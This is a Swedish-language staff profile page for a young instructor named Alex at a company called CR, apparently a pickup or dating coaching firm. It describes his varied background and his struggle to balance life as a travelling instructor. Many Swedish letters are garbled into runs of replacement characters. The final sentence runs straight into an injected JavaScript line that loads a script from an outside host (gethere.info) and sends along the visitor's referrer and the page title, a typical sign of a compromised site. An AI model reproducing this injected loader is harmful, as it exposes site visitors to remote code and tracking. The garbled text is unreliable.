Alex S

Alex S 397x600 Alex SÅlder:
20 år

Yrke:
Personlig assistent & Bartender

Intressen:
Skriva om och uppleva populärkultur som film, musik och spel. Festar gärna och spelar instrument då och då.

Alex är en person som är svår att kategorisera, vilket också är precis så som han vill ha det. Han har (i olika perioder) varit svensk mästare i boxning på juniornivå, kommit sist i klassen på löptest, varit en ”inlåst spelnörd” och gått ut på nattklubbar fem kvällar i veckan. Om det beror på att han gillar förändring eller bara att han ännu inte ”funnit sig själv” låter han andra svara på.

Alex utveckling inom det vi gör började redan som sextonåring under en period där hans tidigare flyt med tjejer verkade ha försvunnit. Han bestämde sig för att se det som en utmaning och lovade sig själv att utvecklas och ”bli en av de bästa”. Hösten 2007 fick han (och accepterade) erbjudandet att vara med och starta upp CR och jobba som en av huvudinstruktörerna från start.

Livet som instruktör beskriver Alex ofta som utmanande och svårt, speciellt när man är ung. Ego-kickar och glädje blandat med bristen p�������������������������������� struktur av att hela tiden vara på resande fot, för lite sömn och trycket att prestera och skapa resultat för CRs kunder kan leda till en ibland skum tillvaro som kräver en viss dos livserfarenhet f��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������r att handskas med. Som yngst på C-R tycker han själv att det var sv����������rt att f�� balans i det till en början och fick sig en tankeställare först när livet som en professionell instruktör började kännas som en börda mer än en förmån att vara glad för.

Idag har han funnit en bättre balans och jobbar med C-R med en större distans (speciellt självdistans). Alex ambition är idag att finna en balans som inte bara gynnar honom själv, utan ��������������ven företaget och eleverna.

Som en del av den ambitionen tar han sig tiden att g������������������������������ra mycket research och han är alltid övertygad om att det finns information och lärdomar där ute som kan förb��ttra och revolutionera det vi gör.

D����r ligger hans fokus idag. Att utveckla ett liv som leder till hans drömmars land. Vi är glada och stolta över att vi får vara med på den resan, och hoppas ocks�� att vi är en del av att göra drömmarna till verklighet.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;